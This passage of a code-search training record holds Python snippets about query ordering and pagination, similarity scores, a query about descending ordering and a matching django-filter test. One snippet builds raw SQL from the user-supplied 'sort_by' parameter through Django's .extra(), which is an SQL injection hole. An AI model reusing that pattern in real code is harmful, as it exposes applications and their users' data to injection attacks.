equation|a + b)\n elif is_equation(bare_orderby):\n resolved_orderby = self.equation_alias_map[strip_equation(bare_orderby)]\n bare_orderby = resolved_orderby.alias\n else:\n resolved_orderby = self.resolve_column(bare_orderby)\n except (NotImplementedError, IncompatibleMetricsQuery):\n resolved_orderby = None\n\n direction = Direction.DESC if orderby.startswith(\"-\") else Direction.ASC\n\n if fields.is_function(bare_orderby) and (\n isinstance(resolved_orderby, Function)\n or isinstance(resolved_orderby, CurriedFunction)\n or isinstance(resolved_orderby, AliasedExpression)\n ):\n bare_orderby = resolved_orderby.alias\n\n for selected_column in self.columns:\n if isinstance(selected_column, Column) and selected_column == resolved_orderby:\n validated.append(OrderBy(selected_column, direction))\n break\n elif (\n isinstance(selected_column, AliasedExpression)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n break\n # We cannot directly order by an `AliasedExpression`.\n # Instead, we order by the column inside.\n validated.append(OrderBy(selected_column.exp, direction))\n break\n\n elif (\n isinstance(selected_column, CurriedFunction)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n validated.append(OrderBy(selected_column, direction))\n break\n\n if len(validated) == len(orderby_columns):\n return validated\n\n # TODO: This is no longer true, can order by fields that aren't selected, keeping\n # for now so we're consistent with the existing functionality\n raise InvalidSearchQuery(\"Cannot sort by a field that is not selected.\")", "def get_paginate_by(self, queryset):\n return self.request.GET.get('paginate_by', self.paginate_by)", "def get_queryset(self):\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', 'title')\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', 'ASC')\n self.sort_ordr=sort_order\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(title__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = Designation.objects.filter(a | b).distinct()\n else: # SORTING BY COL_NM\n objects = Designation.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def get_default_paginate_by(self, queryset):\n return self.paginate_by", "def get_queryset(self):\n queryset = super(viewsets.ModelViewSet, self).get_queryset().order_by('first_name')\n\n if self.request.GET.get('q', None):\n return queryset.filter(username__icontains=self.request.GET['q'])\n return queryset", "def __init__(\n self,\n queryset,\n per_page=25,\n ordering=\"pk\",\n allow_count=False,\n allow_empty_first_page=True,\n orphans=0,\n ):\n self.queryset = queryset\n self.per_page = int(per_page)\n self.ordering = ordering\n self.allow_count = allow_count\n\n field = ordering.replace(\"-\", \"\")\n self._reverse_ordering = field if ordering[0] == \"-\" else \"-{0}\".format(ordering)\n self._field = field", "def sort_field():\n _id = request.form['_id']\n old_index = request.form['old_index']\n new_index = request.form['new_index']\n data, code, message = FIELD_SERVICE.sort_field(_id, old_index, new_index)\n return __result(data, code, message)", "def sort(self, field='word', 
order=None):\n self.data = list(self.sorted(field, order))", "def order_by(self, *orderings):\n return OrderedQuery(self, orderings)", "def ordered(self):\n if isinstance(self, EmptyQuerySet):\n return True\n if self.query.extra_order_by or self.query.order_by:\n return True\n elif (\n self.query.default_ordering\n and self.query.get_meta().ordering\n and\n # A default ordering doesn't affect GROUP BY queries.\n not self.query.group_by\n ):\n return True\n else:\n return False", "def order_by(self, *fields):\n doc = []\n for field in fields:\n if field.startswith('-'):\n doc.append((field.strip('-'), pymongo.DESCENDING))\n else:\n doc.append((field, pymongo.ASCENDING))\n return self.sort(doc)", "def pre_filter(self, qs):\n return qs", "def test_shelflistitem_view_orderby(order_by, api_settings, shelflist_solr_env,\n get_shelflist_urls, api_client):\n sl_urls = get_shelflist_urls(shelflist_solr_env.records['shelflistitem'])\n test_url = '{}?orderBy={}'.format(sl_urls.values()[0], order_by)\n response = api_client.get(test_url)\n assert response.status_code == 400\n assert 'not a valid field for ordering' in response.data['detail']", "def sort_on(self):\n if \"sortOn\" in self._prop_dict:\n return self._prop_dict[\"sortOn\"]\n else:\n return None", "def list(self, request, *args, **kwargs):\n self.order_queryset = True\n if 'ordering' in request.query_params.keys():\n self.order_queryset = False\n return super(ReleaseViewSet, self).list(request, *args, **kwargs)", "def queryset(self, request):\n qs = self.model.all_objects.get_query_set()\n ordering = self.ordering or ()\n if ordering:\n qs = qs.order_by(*ordering)\n return qs", "def setSearchFieldnames(self, fieldnames):\n self._search_fieldnames = fieldnames", "def sort_order(self, sort_order):\n\n self._sort_order = sort_order", "def setFieldNames(self, model, lyr): \n #get the fields\n fields = lyr.pendingFields()\n position = 0\n \n #set column names\n for field in fields:\n model.setHorizontalHeaderItem(position, QStandardItem(field.name()))\n position+=1", "def get_queryset(self, request):\n querys = self.model.all_objects.get_queryset()\n ordering = self.get_ordering(request)\n if ordering:\n querys = querys.order_by(*ordering)\n return querys", "def default_sort_column(self, default_sort_column):\n\n self._default_sort_column = default_sort_column", "def get_sort_query(self, kind, order, is_number):\n pass", "def testSortNoDbAscending(self):\n self.request.GET['sort'] = \"custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 04\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 08\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 12\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def order_by_as_sql(self):\n return comma_join([\n '%s DESC' % field[1:] if isinstance(field, str) and field[0] == '-' else str(field)\n for field in self._order_by\n ])", "def order_by(self, list_or_name):\n if not isinstance(list_or_name, basestring):\n for c in list_or_name:\n self.order_by(c)\n else:\n self._orderby_conds.append(list_or_name)\n\n return self" ]
[ "0.7114981", "0.6805322", "0.65821075", "0.6384245", "0.6316189", "0.6254384", "0.6160399", "0.60926193", "0.59577346", "0.59503293", "0.59400135", "0.5909272", "0.5759706", "0.57583076", "0.57493776", "0.5726326", "0.5716653", "0.571355", "0.5712792", "0.5647503", "0.5642596", "0.5628735", "0.56165737", "0.55814326", "0.55741805", "0.55557436", "0.5532448", "0.5529606", "0.5519835", "0.5511644", "0.5485929", "0.5465671", "0.54204506", "0.5419675", "0.54087925", "0.5402096", "0.5371906", "0.53660154", "0.53618526", "0.5359104", "0.5352894", "0.5334281", "0.5329987", "0.5329112", "0.5325092", "0.53136086", "0.5311685", "0.5303327", "0.5302453", "0.52917993", "0.52610624", "0.52568024", "0.52540207", "0.52511346", "0.522411", "0.52015024", "0.51937896", "0.5186127", "0.51592165", "0.5133022", "0.5132554", "0.510349", "0.50978875", "0.509699", "0.5087841", "0.5079201", "0.5072474", "0.5072194", "0.5070364", "0.5067101", "0.5014353", "0.5012664", "0.50006074", "0.49766332", "0.49702168", "0.49586567", "0.495488", "0.49414554", "0.49271742", "0.49263468", "0.49259594", "0.49211022", "0.49133986", "0.48979747", "0.48888963", "0.48784864", "0.48675054", "0.48620343", "0.48601866", "0.4846724", "0.48267564", "0.48263326", "0.48251227", "0.48155618", "0.48122683", "0.4795051", "0.47769246", "0.47763884", "0.47747236", "0.4774328" ]
0.7341014
0
Test ordering descending works when order_by=True.
def test_ordering_descending_unset(self):
    class F(FilterSet):
        class Meta:
            model = User
            fields = ['username', 'status']
            order_by = True

    f = F({'o': '-username'}, queryset=self.qs)
    self.assertQuerysetEqual(
        f.qs, ['jacob', 'carl', 'alex', 'aaron'], lambda o: o.username)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_orderby(self):\n\n # TODO: make a unit test out of these various combinations\n #m = mapper(User, users, order_by=desc(users.c.user_name))\n mapper(User, users, order_by=None)\n #mapper(User, users)\n\n #l = create_session().query(User).select(order_by=[desc(users.c.user_name), asc(users.c.user_id)])\n l = create_session().query(User).all()\n #l = create_session().query(User).select(order_by=[])\n #l = create_session().query(User).select(order_by=None)", "def orderby():\n pass", "def test_ordering_by_price_desc(self):\n request = self.factory.get('/api/v1/cars', {'distance': 10000,\n 'ordering': '-price'})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n cars = response.data['results'][0:2]\n self.assertGreater(cars[0]['price'], cars[1]['price'])\n self.assertNotEqual(cars[0], cars[1])", "def is_descending(self):\n return self._tag == 'descending'", "def test_order_by(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n names = [p.name for p in self.Person.objects.order_by(\"-age\")]\n assert names == [\"User B\", \"User C\", \"User A\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"+age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n ages = [p.age for p in self.Person.objects.order_by(\"-name\")]\n assert ages == [30, 40, 20]\n\n ages = [p.age for p in self.Person.objects.order_by()]\n assert ages == [40, 20, 30]\n\n ages = [p.age for p in self.Person.objects.order_by(\"\")]\n assert ages == [40, 20, 30]", "def testSortDescending(self):\n self.request.GET['sort'] = \"-name\"\n self.datagrid.load_state()\n\n self.assertEqual(self.datagrid.sort_list, [\"-name\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 99\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 98\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 97\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def is_descending(self):\r\n return self.startswith('-')", "def testSortNoDbDescending(self):\n self.request.GET['sort'] = \"-custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"-custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 03\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 07\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 11\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def orderby(cls, field, desc=False):\n cls.runtime.set_orderby((field, desc))\n return cls", "def test_ordering_with_overridden_field_name_and_descending(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status', '-status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status'), ('-status', 'Status (descending)')])", "def test_get_movies_order_by_rating_desc(self):\n\n r = self.client.get(reverse('movieapi:movies'), {'order_by': 'rating', 'desc': 'true'})\n\n qs = 
Movie.get_all().order_by('-imdbrating')\n serializer = MovieSerializer(qs, many=True)\n\n self.assertJSONEqual(\n r.content,\n serializer.data\n )\n self.assertEqual(r.status_code, 200)", "def test_subquery_with_order(self):\n with self.patch_schema({}):\n sql = (\n \"SELECT COUNT(*) FROM (\"\n \"SELECT DISTINCT id FROM a ORDER BY id DESC) a\"\n )\n stmt = sqlparse.parse(sql)[0]\n assert True == self.has_order_by_count(stmt)", "def test_sortby_invalid(self):\n qs = {'a': 1, 'w': 4, 'format': 'json', 'sortby': ''}\n response = self.client.get(reverse('search.advanced'), qs)\n eq_(200, response.status_code)", "def test_clear_ordering(self):\n ORDER_BY_KEY, CMD_QUERY_KEY = get_key_compat(self.mongodb_version)\n\n class BlogPost(Document):\n title = StringField()\n published_date = DateTimeField()\n\n meta = {\"ordering\": [\"-published_date\"]}\n\n BlogPost.drop_collection()\n\n # default ordering should be used by default\n with db_ops_tracker() as q:\n BlogPost.objects.filter(title=\"whatever\").first()\n assert len(q.get_ops()) == 1\n assert q.get_ops()[0][CMD_QUERY_KEY][ORDER_BY_KEY] == {\"published_date\": -1}\n\n # calling order_by() should clear the default ordering\n with db_ops_tracker() as q:\n BlogPost.objects.filter(title=\"whatever\").order_by().first()\n assert len(q.get_ops()) == 1\n assert ORDER_BY_KEY not in q.get_ops()[0][CMD_QUERY_KEY]\n\n # calling an explicit order_by should use a specified sort\n with db_ops_tracker() as q:\n BlogPost.objects.filter(title=\"whatever\").order_by(\"published_date\").first()\n assert len(q.get_ops()) == 1\n assert q.get_ops()[0][CMD_QUERY_KEY][ORDER_BY_KEY] == {\"published_date\": 1}\n\n # calling order_by() after an explicit sort should clear it\n with db_ops_tracker() as q:\n qs = BlogPost.objects.filter(title=\"whatever\").order_by(\"published_date\")\n qs.order_by().first()\n assert len(q.get_ops()) == 1\n assert ORDER_BY_KEY not in q.get_ops()[0][CMD_QUERY_KEY]", "def testSortingReverse(self):\n if self.sortingReverse.lower() in [\"1\", \"yes\", \"true\", \"on\"]:\n self.assertTrue(\n self.config.sortingReverse\n )\n elif self.sortingReverse.lower() in [\"0\", \"no\", \"false\", \"off\"]:\n self.assertFalse(\n self.config.sortingReverse\n )\n else:\n self.assertEqual(\n tools.SORTING_REVERSE_DEFAULT,\n self.config.sortingReverse\n )", "def test_query_sort_nondefault_sort_order(self):\n doc_count = 10\n field_to_be_sorted_by = \"data\"\n prefix = get_rand_string()\n\n data = [prefix + \"-\" + str(x) for x in range(10)]\n\n # Same user_id for all documents\n user_id = get_rand_string()\n\n for datum in data:\n self.conn.add(id=get_rand_string(), user_id=user_id, data=datum)\n self.conn.commit()\n\n results = self.conn.query(q=\"user_id:\" + user_id, sort=\"data\",\n sort_order=\"desc\").results\n\n self.assertEquals(len(results), doc_count,\n \"There should be %d documents returned, got:%d, results:%s\" % (\n doc_count, len(results), results))\n\n query_data = [doc[\"data\"] for doc in results]\n\n for idx, datum in enumerate(reversed(sorted(data))):\n self.assertEquals(datum, query_data[idx],\n \"Expected %s instead of %s on position %s in query_data:%s\" % (\n datum, query_data[idx], idx, query_data))", "def test_get_movies_order_by_title_desc(self):\n\n r = self.client.get(reverse('movieapi:movies'), {'order_by': 'title', 'desc': 'true'})\n\n qs = Movie.get_all().order_by('-title')\n serializer = MovieSerializer(qs, many=True)\n\n self.assertJSONEqual(\n r.content,\n serializer.data\n )\n self.assertEqual(r.status_code, 200)", "def 
is_ascending(self):\r\n return not self.is_descending", "def test_order_direction(self):\n threads = [make_minimal_cs_thread()]\n self.register_get_user_response(self.user)\n self.register_get_threads_response(threads, page=1, num_pages=1)\n self.client.get(\n self.url,\n {\n \"course_id\": str(self.course.id),\n \"order_direction\": \"desc\",\n }\n )\n self.assert_last_query_params({\n \"user_id\": [str(self.user.id)],\n \"course_id\": [str(self.course.id)],\n \"sort_key\": [\"activity\"],\n \"page\": [\"1\"],\n \"per_page\": [\"10\"],\n })", "def sortby(self):\n ...", "def test_order_by(self, http_query, cc_query):\n threads = [make_minimal_cs_thread()]\n self.register_get_user_response(self.user)\n self.register_get_threads_response(threads, page=1, num_pages=1)\n self.client.get(\n self.url,\n {\n \"course_id\": str(self.course.id),\n \"order_by\": http_query,\n }\n )\n self.assert_last_query_params({\n \"user_id\": [str(self.user.id)],\n \"course_id\": [str(self.course.id)],\n \"page\": [\"1\"],\n \"per_page\": [\"10\"],\n \"sort_key\": [cc_query],\n })", "def test_order_by(self):\n try:\n self.init_pglist_data(self.node)\n\n print(\"Creating index 'rumidx_orderby_sent'\")\n\n self.node.safe_psql(\n \"pglist\",\n \"CREATE INDEX rumidx_orderby_sent ON pglist USING rum (\"\n \" fts rum_tsvector_timestamp_ops, sent) \"\n \" WITH (attach=sent, to=fts, order_by_attach=t)\")\n\n print(\"Running tests\")\n\n self.assertEqual(\n self.node.safe_psql(\n \"pglist\",\n \"SELECT sent, subject \"\n \" FROM pglist \"\n \" WHERE fts @@ \"\n \" to_tsquery('english', 'backend <-> crushed') \"\n \" ORDER BY sent <=| '2016-01-01 00:01' LIMIT 5\"\n ),\n b'1999-06-02 11:52:46|Re: [HACKERS] PID of backend\\n'\n )\n\n self.assertEqual(\n self.node.safe_psql(\n \"pglist\",\n \"SELECT count(*) FROM pglist \"\n \"WHERE fts @@ to_tsquery('english', 'tom & lane')\"\n ),\n b'222813\\n'\n )\n\n self.node.safe_psql(\"pglist\", \"DROP INDEX rumidx_orderby_sent\");\n\n print(\"Creating index 'pglist_rum_idx'\")\n\n self.node.safe_psql(\n \"pglist\",\n \"CREATE INDEX pglist_rum_idx ON pglist USING rum (\"\n \" fts rum_tsvector_ops)\")\n\n print(\"Running tests\")\n\n self.assertEqual(\n self.node.execute(\n \"pglist\",\n \"SELECT id FROM pglist \"\n \"WHERE fts @@ to_tsquery('english', 'postgres:*') \"\n \"ORDER BY fts <=> to_tsquery('english', 'postgres:*') \"\n \"LIMIT 9\"\n )[0][0],\n 816114\n )\n\n # Autovacuum after large update, with active RUM index crashes postgres\n print(\"Test Issue #19\")\n\n self.node.safe_psql(\n \"pglist\",\n \"DELETE FROM pglist WHERE id < 100000\")\n self.node.safe_psql(\n \"pglist\",\n \"vacuum\")\n\n self.node.safe_psql(\"pglist\", \"DROP INDEX pglist_rum_idx\");\n\n except Exception as e:\n self.printlog(os.path.join(self.node.logs_dir, \"postgresql.log\"))\n raise e", "def test_order_by_chaining(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n only_age = self.Person.objects.order_by(\"-age\").only(\"age\")\n\n names = [p.name for p in only_age]\n ages = [p.age for p in only_age]\n\n # The .only('age') clause should mean that all names are None\n assert names == [None, None, None]\n assert ages == [40, 30, 20]\n\n qs = self.Person.objects.all().order_by(\"-age\")\n qs = qs.limit(10)\n ages = [p.age for p in qs]\n assert ages == [40, 30, 20]\n\n qs = self.Person.objects.all().limit(10)\n qs = qs.order_by(\"-age\")\n\n ages = [p.age for p in qs]\n assert ages == [40, 30, 20]\n\n qs = 
self.Person.objects.all().skip(0)\n qs = qs.order_by(\"-age\")\n ages = [p.age for p in qs]\n assert ages == [40, 30, 20]", "def test_get_entities_no_filter_sort_username_desc(app):\n with app.app_context():\n users = get_entities(User, 1, 5, [],\n dict(column='username', dir='desc'))\n assert users.page == 1\n assert users.per_page == 5\n assert 'ORDER BY users.username DESC' in str(users.query.statement)", "def test_calc_sort_without_after_object(self):\n test_object = self.test.datum_type2\n actual = test_object._calc_sort_value(sort_base_length=3,\n increment=1,\n sort_prefix_parts=[test_object.datum_group.sort]\n )\n expected = 10101\n self.assertEqual(expected, actual)", "def order_by(self):\r\n if self.column.order_by is not None:\r\n order_by = self.column.order_by\r\n else:\r\n # default to using column accessor as data source sort key\r\n order_by = OrderByTuple((self.accessor, ))\r\n return order_by.opposite if self.order_by_alias.is_descending else order_by", "def test_no_ordering_for_get(self):\n ORDER_BY_KEY, CMD_QUERY_KEY = get_key_compat(self.mongodb_version)\n\n class BlogPost(Document):\n title = StringField()\n published_date = DateTimeField()\n\n meta = {\"ordering\": [\"-published_date\"]}\n\n BlogPost.objects.create(\n title=\"whatever\", published_date=datetime.datetime.utcnow()\n )\n\n with db_ops_tracker() as q:\n BlogPost.objects.get(title=\"whatever\")\n assert len(q.get_ops()) == 1\n assert ORDER_BY_KEY not in q.get_ops()[0][CMD_QUERY_KEY]\n\n # Ordering should be ignored for .get even if we set it explicitly\n with db_ops_tracker() as q:\n BlogPost.objects.order_by(\"-title\").get(title=\"whatever\")\n assert len(q.get_ops()) == 1\n assert ORDER_BY_KEY not in q.get_ops()[0][CMD_QUERY_KEY]", "def order_by(self, field, descending=False):\n self._order_by.append((field, descending))\n return self", "def sort_descending(self):\n # sort_descending_sitem = self.locator_finder_by_idx(self.sort_descending_id)\n # sort_descending_sitem = sort_descending_sitem.find_element_by_xpath(\"./..\")\n # sort_descending_sitem.click()\n # time.sleep(2)\n \n if self.current_package_version() == semver.VersionInfo.parse(\"3.8.0\"):\n sort_by_descending = '//*[@id=\"collectionsDropdown\"]/ul[3]/li[4]/a/label/i'\n sort_descending_sitem = self.locator_finder_by_xpath(sort_by_descending)\n else:\n sort_descending_sitem = self.locator_finder_by_xpath(self.sort_descending_id)\n sort_descending_sitem.click()\n time.sleep(2)", "def test_get_order(self):\n pass", "def test_reversed_version_sorting(self):\n assert natsort(['1', '5', '10', '50'], reverse=True) == ['50', '10', '5', '1']", "def test_list_tasks_order_name_desc(self):\n rv = TEST_CLIENT.post(\"/tasks/list-tasks\", json={\"order\": \"name desc\"})\n result = rv.json()\n\n expected = util.MOCK_TASK_LIST_SORTED_BY_NAME_DESC\n self.assertEqual(result, expected)\n self.assertEqual(rv.status_code, 200)", "def testSortOrder(self):\n timestamp = time.time()\n comment_id1 = Comment.ConstructCommentId(timestamp, 0, 0)\n comment_id2 = Comment.ConstructCommentId(timestamp + 1, 0, 0)\n self.assertGreater(comment_id2, comment_id1)", "def order_by(self, *fields):\n self._evaluated = False\n if self._order is None:\n self._order = []\n\n for field in fields:\n direction = \"asc\"\n if field.startswith('-'):\n direction = \"desc\"\n field = field[1:]\n\n self._order.append({ field : direction })\n\n return self", "def opposite(self):\r\n return OrderBy(self[1:]) if self.is_descending else OrderBy('-' + self)", "def 
sort(self,desc):\n\tself.__sort(\"\",\"\",desc)", "def order_by(self, *args):\n order_clauses = self.order_clauses[:]\n related_clauses = self.related_clauses[:]\n model = self.proxy.model\n for arg in args:\n if isinstance(arg, str):\n # Convert django-style to sqlalchemy ordering column\n if arg[0] == '-':\n field = arg[1:]\n ascending = False\n else:\n field = arg\n ascending = True\n\n col = resolve_member_column(model, field, related_clauses)\n\n if ascending:\n clause = col.asc()\n else:\n clause = col.desc()\n else:\n clause = arg\n if clause not in order_clauses:\n order_clauses.append(clause)\n return self.clone(order_clauses=order_clauses,\n related_clauses=related_clauses)", "def test_order_by(self):\n manifestb = job_test_utils.create_seed_manifest(name='scale-batch-creator', jobVersion='2.0.0')\n job_type1b = job_test_utils.create_seed_job_type(manifest=manifestb)\n job_test_utils.create_job(job_type=job_type1b, status='RUNNING')\n\n manifestc = job_test_utils.create_seed_manifest(name='scale-batch-creator', jobVersion='3.0.0')\n job_type1c = job_test_utils.create_seed_job_type(manifest=manifestc)\n job_test_utils.create_job(job_type=job_type1c, status='RUNNING')\n\n url = '/%s/jobs/?is_superseded=false&order=job_type__name&order=-job_type__version' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 4)\n\n self.assertEqual(result['results'][0]['job_type']['id'], job_type1c.id)\n self.assertEqual(result['results'][1]['job_type']['id'], job_type1b.id)\n self.assertEqual(result['results'][2]['job_type']['id'], self.job_type1.id)\n self.assertEqual(result['results'][3]['job_type']['id'], self.job_type2.id)", "def test_get_sort_value_without_after_object(self):\n test_object = self.test.datum_type2\n actual = test_object.get_sort_value()\n expected = 10101\n self.assertEqual(expected, actual)", "def reversesort(self):\n ...", "def sort_by(function):\n f = partial(sorted, key=function)\n f.attrs = {'descending': _descending_sort_by(function)}\n return f", "def testSorting(self):\n if self.sorting in tools.SORTINGS:\n self.assertEqual(\n self.sorting,\n self.config.sorting\n )\n else:\n self.assertNotEqual(\n self.sorting,\n self.config.sorting\n )\n self.assertEqual(\n tools.SORTING_DEFAULT,\n self.config.sorting\n )", "def test_shelflistitem_view_orderby(order_by, api_settings, shelflist_solr_env,\n get_shelflist_urls, api_client):\n sl_urls = get_shelflist_urls(shelflist_solr_env.records['shelflistitem'])\n test_url = '{}?orderBy={}'.format(sl_urls.values()[0], order_by)\n response = api_client.get(test_url)\n assert response.status_code == 400\n assert 'not a valid field for ordering' in response.data['detail']", "def test_last_sort_value_no_sort_range(self):\n test_object = self.test.datum_type2\n actual = test_object._last_sort_value()\n expected = 20100\n self.assertEqual(expected, actual)", "def test_get_data_with_desc_sort_dir(self, mock_api):\n mock_client = mock_api.muranoclient(mock.Mock())\n mock_client.categories.list.return_value = [\n 'foo_cat', 'bar_cat'\n ]\n self.categories_view.request.GET.get.side_effect = [None, 'bar_marker']\n\n result = self.categories_view.get_data()\n\n expected_categories = ['foo_cat', 'bar_cat']\n expected_kwargs = {\n 'filters': {},\n 'marker': 'bar_marker',\n 'sort_dir': 'desc',\n 'limit': 3\n }\n\n self.assertEqual(expected_categories, result)\n 
self.assertFalse(self.categories_view.has_more_data(None))\n self.assertTrue(self.categories_view.has_prev_data(None))\n self.categories_view.request.GET.get.assert_has_calls([\n mock.call(tables.CategoriesTable._meta.prev_pagination_param,\n None),\n mock.call(tables.CategoriesTable._meta.pagination_param, None)\n ])\n mock_client.categories.list.assert_called_once_with(\n **expected_kwargs)", "def is_ascending(self):\n return self._tag == 'ascending'", "def test_sort_reversed():\n assert bubble_sort([5, 4, 3, 2, 1]) == [1, 2, 3, 4, 5]", "def user_order_by(self, field):\n # Get ordering model.\n model_label = order.utils.resolve_labels('.'.join(\\\n [self.model._meta.app_label, self.model._meta.object_name]))\n orderitem_set = getattr(self.model, \\\n order.utils.resolve_order_item_related_set_name(model_label))\n order_model = orderitem_set.related.model\n\n # Resolve ordering model table name.\n db_table = order_model._meta.db_table\n\n # Add ordering field as extra queryset fields.\n pk_name = self.model._meta.pk.attname\n\n # If we have a descending query remove '-' from field name when quering.\n sanitized_field = field.lstrip('-')\n\n extra_select = {\n sanitized_field: '(SELECT %s from %s WHERE item_id=%s.%s)' % \\\n (sanitized_field, db_table, self.model._meta.db_table, pk_name)\n }\n\n # Use original field name when ordering to allow for descending.\n return self.extra(select=extra_select).all().order_by(field)", "def desc(self):\n self.get_output = sorted(sorted((value, key) for (key, value) in self.get_output.items()), reverse=True)", "def test_timeline_order_sorted_by_last_comment_publish_date(self):\n from .mockers import user_status, user_comment\n username = 'messi'\n self.create_user(username)\n activity_ids = []\n # Create 7 activities to overpass limit of 5\n for i in range(7):\n activity_ids.append(self.create_activity(username, user_status).json['id'])\n res = self.testapp.post('/activities/%s/comments' % str(activity_ids[0]), json.dumps(user_comment), oauth2Header(username), status=201)\n # Get first 5 results\n res = self.testapp.get('/people/%s/timeline?sortBy=comments&limit=5' % username, \"\", oauth2Header(username), status=200)\n self.assertEqual(len(res.json), 5)\n\n self.assertEqual(res.json[0].get('id', None), activity_ids[0])\n self.assertEqual(res.json[1].get('id', None), activity_ids[6])\n self.assertEqual(res.json[2].get('id', None), activity_ids[5])\n self.assertEqual(res.json[3].get('id', None), activity_ids[4])\n self.assertEqual(res.json[4].get('id', None), activity_ids[3])\n\n # get next 2 results\n res = self.testapp.get('/people/%s/timeline?sortBy=comments&limit=5&before=%s' % (username, activity_ids[3]), \"\", oauth2Header(username), status=200)\n self.assertEqual(len(res.json), 2)\n\n self.assertEqual(res.json[0].get('id', None), activity_ids[2])\n self.assertEqual(res.json[1].get('id', None), activity_ids[1])", "def test_external_comments_order(self, order_by_attr):\n with factories.single_commit():\n control = factories.ControlFactory()\n for _ in range(5):\n comment = factories.ExternalCommentFactory(\n description=factories.random_str()\n )\n factories.RelationshipFactory(source=control, destination=comment)\n request_data = [{\n \"filters\": {\n \"expression\": {\n \"object_name\": \"Control\",\n \"op\": {\n \"name\": \"relevant\"\n },\n \"ids\": [control.id]\n },\n },\n \"object_name\": \"ExternalComment\",\n \"order_by\": [{\"name\": order_by_attr, \"desc\": \"true\"}],\n }]\n\n response = self.api.post(\n comment,\n data=request_data,\n 
url=\"/query\"\n )\n\n self.assert200(response)\n response_data = response.json[0][\"ExternalComment\"]\n comments = [val[\"description\"] for val in response_data[\"values\"]]\n expected_comments = db.session.query(\n all_models.ExternalComment.description\n ).order_by(\n getattr(all_models.ExternalComment, order_by_attr).desc(),\n all_models.ExternalComment.id.desc(),\n )\n self.assertEqual(comments, [i[0] for i in expected_comments])", "def test_sort_fewer_than_n(self):\n e1 = Experience(rid=1, uid=3, experience=100)\n e2 = Experience(rid=1, uid=1, experience=89)\n e3 = Experience(rid=1, uid=12, experience=1343)\n db.session.add(e1)\n db.session.add(e2)\n db.session.add(e3)\n db.session.commit()\n list = top_n_in_order(1,5)\n self.assertEqual([(12, 1343), (3, 100), (1, 89)], list)", "def test_order_then_filter(self):\n\n class Number(Document):\n n = IntField()\n\n Number.drop_collection()\n\n n2 = Number.objects.create(n=2)\n n1 = Number.objects.create(n=1)\n\n assert list(Number.objects) == [n2, n1]\n assert list(Number.objects.order_by(\"n\")) == [n1, n2]\n assert list(Number.objects.order_by(\"n\").filter()) == [n1, n2]\n\n Number.drop_collection()", "async def test_txn_list_sorted_in_reverse(self):\n paging = Mocks.make_paging_response(0, 3)\n transactions = Mocks.make_txns('2', '1', '0')\n self.stream.preset_response(head_id='2', paging=paging, transactions=transactions)\n\n response = await self.get_assert_200('/transactions?sort=-header_signature')\n page_controls = Mocks.make_paging_controls()\n sorting = Mocks.make_sort_controls(\n 'header_signature', reverse=True)\n self.stream.assert_valid_request_sent(\n paging=page_controls,\n sorting=sorting)\n\n self.assert_has_valid_head(response, '2')\n self.assert_has_valid_link(response,\n '/transactions?head=2&sort=-header_signature')\n self.assert_has_valid_paging(response, paging)\n self.assert_has_valid_data_list(response, 3)\n self.assert_txns_well_formed(response['data'], '2', '1', '0')", "def test_questions_sortby(self):\n QuestionFactory(title=u'tags tags tags')\n\n self.refresh()\n\n # Advanced search for questions with sortby set to 3 which is\n # '-replies' which is different between Sphinx and ES.\n response = self.client.get(reverse('search.advanced'), {\n 'q': 'tags', 'tags': 'desktop', 'w': '2', 'a': '1', 'sortby': '3',\n 'format': 'json'\n })\n\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['total'], 1)", "def sort(self, desc):\n self.__sortByIndex(0, desc)", "def ordered(self):\n if isinstance(self, EmptyQuerySet):\n return True\n if self.query.extra_order_by or self.query.order_by:\n return 